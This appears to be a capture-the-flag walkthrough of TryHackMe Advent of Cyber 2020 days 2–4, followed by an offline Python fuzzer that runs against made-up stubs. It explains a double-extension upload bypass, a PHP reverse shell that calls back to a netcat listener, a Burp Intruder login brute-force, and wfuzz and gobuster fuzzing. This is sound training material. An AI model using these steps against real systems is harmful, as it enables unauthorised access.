TryHackMe — Advent of Christmas 2-2020
Task 7 [Day 2] Web Exploitation The Elf Strikes Back!
- What string of text needs adding to the URL to get access to the upload page?
The page keys access on an id parameter, so the string to add to the URL is ?id=ODIzODI5MTNiYmYw
- What type of file is accepted by the site?
Try inspecting the source code of the upload form; the accepted file type is spelled out there.
Oh! This looks like an “I***E” file
- In which directory are the uploaded files stored?
Read through the source of the file upload section: the directory the uploads are written to is named right there.
- Activate your reverse shell and catch it in a netcat listener!
You can download the PHP reverse shell from pentestmonkey (php-reverse-shell.php).
Change $ip in the script to your attacking machine (the tun0 address from your VPN, or the AttackBox address) and, if you want, change $port as well. Find your address with:
ifconfig tun0
(or ip addr show tun0)
Next, set up a netcat listener on the port you put in the script (1234 is the script's default):
nc -lvnp 1234
Upload the shell. The form only wants image files and the check is on the file name, not the content, so if a plain .php name is refused, a name such as shell.jpg.php usually gets past the filter while the server still executes the file as PHP.
Now navigate to the uploads directory and click on the PHP file. The server runs it and the listener immediately catches a shell.
cat /var/www/flag.txt
Task 8 [Day 3] Web Exploitation Christmas Chaos
Firing up the box, we are met with a login page.
- What is the flag?
We are going to brute-force the login page with Burp Suite.
I use FoxyProxy to manage the Burp proxy so I do not have to change it manually in the browser settings.
Turn on FoxyProxy
Fire up Burp Suite
Then go to the login page and enter some random login info, using admin for the username and pass for the password. We only want to submit the form so Burp captures the request.
Hit Forward until the POST request with username=admin&password=pass shows up in the proxy history.
Press Ctrl+I to send that request to Intruder. Intruder is the tool for brute-forcing login fields.
Positions tab
Attack type: Cluster Bomb
username=§admin§&password=§pass§
The § markers define the fields that will be replaced by entries from the wordlists. Cluster Bomb tries every combination of the two lists, so two positions need two payload sets.
Payloads tab: load the username list as payload set 1 and the password list as payload set 2.
Start Attack
Don't be misled by the status codes: every attempt comes back with the same code. Sort by Length instead. The single response with a different length (255 here) is the successful login, because the page it returns is not the usual error page.
Log in with those creds
Access granted
Task 9 [Day 4] Web Exploitation Santa’s watching
Given the URL “http://shibes.xyz/api.php”, what would the entire wfuzz command look like to query the “breed” parameter using the wordlist “big.txt” (assume that “big.txt” is in your current directory)?
wfuzz -c -z file,big.txt http://shibes.xyz/api.php?breed=FUZZ
Here -c colours the output, -z file,big.txt takes the payloads from big.txt, and FUZZ marks where each payload is substituted. In a real shell, quote the URL so the ? and any & are not interpreted by the shell.
Use GoBuster (against the target you deployed — not the shibes.xyz domain) to find the API directory. What file is there?
Running the gobuster command (-x php also tries each word with a .php extension):
gobuster dir -u http://10.10.24.64 -w big.txt -x php
That turns up the /api directory. Run gobuster again with -u http://10.10.24.64/api -x php (or just browse to /api) to see the file inside it.
Fuzz the date parameter on the file you found in the API directory. What is the flag displayed in the correct post?
Now that we know that site-log.php is the file inside the api directory, we can fuzz its date parameter.
Replace the value of the date parameter with the FUZZ placeholder and run wfuzz against it with a wordlist of dates.
Almost every date returns the same empty response. Look for the one line whose response differs from all the others (a different word or character count); hiding the common responses with --hw 0 or --hh <length> makes it stand out.
That response is the correct post, and it contains the flag.
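The Burp Intruder attack in Task 8 and the wfuzz run in Task 9 are the same technique: substitute payloads into one or more marked positions, send every combination, and spot the hit by a response that is a different size from the rest. The following Python script is an added example illustrating that, not code from this writeup or from TryHackMe. It targets two constructed stand-in functions, stub_login and stub_site_log, so it runs offline; the credentials, the YYYYMMDD date format, the date that "hits" and the flag text are all made up for the example.

```python
# Added example (not from the writeup): a minimal cluster-bomb fuzzer in the
# style of Burp Intruder / wfuzz, with the "look at the Length column"
# heuristic for picking out the interesting response.  The two targets below
# are constructed stubs, and every credential, date and flag in them is made up.
from collections import Counter
from itertools import product
from typing import Callable, Iterable, List, Sequence, Tuple

Combo = Tuple[str, ...]


def expand(template: str, payload_sets: Sequence[Iterable[str]]) -> List[Tuple[Combo, str]]:
    """Cluster-bomb expansion: wfuzz-style markers FUZZ, FUZ2Z, FUZ3Z ... are each
    bound to their own payload set and every combination of the sets is emitted."""
    markers = ["FUZZ"] + [f"FUZ{i}Z" for i in range(2, len(payload_sets) + 1)]
    expanded = []
    for combo in product(*payload_sets):
        request = template
        for marker, value in zip(markers, combo):
            request = request.replace(marker, value)
        expanded.append((combo, request))
    return expanded


def length_outliers(results: List[Tuple[Combo, str]]) -> List[Combo]:
    """Return the combos whose response length differs from the most common one.
    A failed login or an empty API result is the same size every time; the hit
    is the response that breaks the pattern, regardless of its status code."""
    lengths = [len(response) for _, response in results]
    baseline = Counter(lengths).most_common(1)[0][0]
    return [combo for combo, response in results if len(response) != baseline]


def fuzz(template: str, payload_sets: Sequence[Iterable[str]],
         send: Callable[[str], str]) -> List[Combo]:
    """Send every expansion of the template through `send` and report the outliers."""
    results = [(combo, send(request)) for combo, request in expand(template, payload_sets)]
    return length_outliers(results)


# --- constructed stand-ins for the two targets (not the real rooms) -----------
def stub_login(request: str) -> str:
    """Mimics a login form that answers every bad attempt with the same error page."""
    params = dict(pair.split("=", 1) for pair in request.split("&"))
    if params == {"username": "admin", "password": "winter2020"}:   # made-up creds
        return "<html>Welcome back, admin. <a href='/dashboard'>Continue</a></html>"
    return "<html>Invalid username or password.</html>"


def stub_site_log(request: str) -> str:
    """Mimics api/site-log.php?date=...: empty body unless the date has a post."""
    date = request.rsplit("=", 1)[1]
    return "FLAG{constructed-example}" if date == "20201203" else ""   # made-up


if __name__ == "__main__":
    # Task 8 shape: two positions, Cluster Bomb over usernames x passwords.
    users = ["admin", "guest", "root"]
    passwords = ["password", "winter2020", "letmein"]
    print(fuzz("username=FUZZ&password=FUZ2Z", [users, passwords], stub_login))

    # Task 9 shape: one position, a wordlist of dates (YYYYMMDD is an assumption).
    dates = [f"202012{day:02d}" for day in range(1, 8)]
    print(fuzz("/api/site-log.php?date=FUZZ", [dates], stub_site_log))
```

The length heuristic has one caveat worth remembering from Burp: it only works when the hit is rare. If the wordlist is tiny, or the target pads error pages with random content, compare word counts or grep for a known string instead of trusting the most common length.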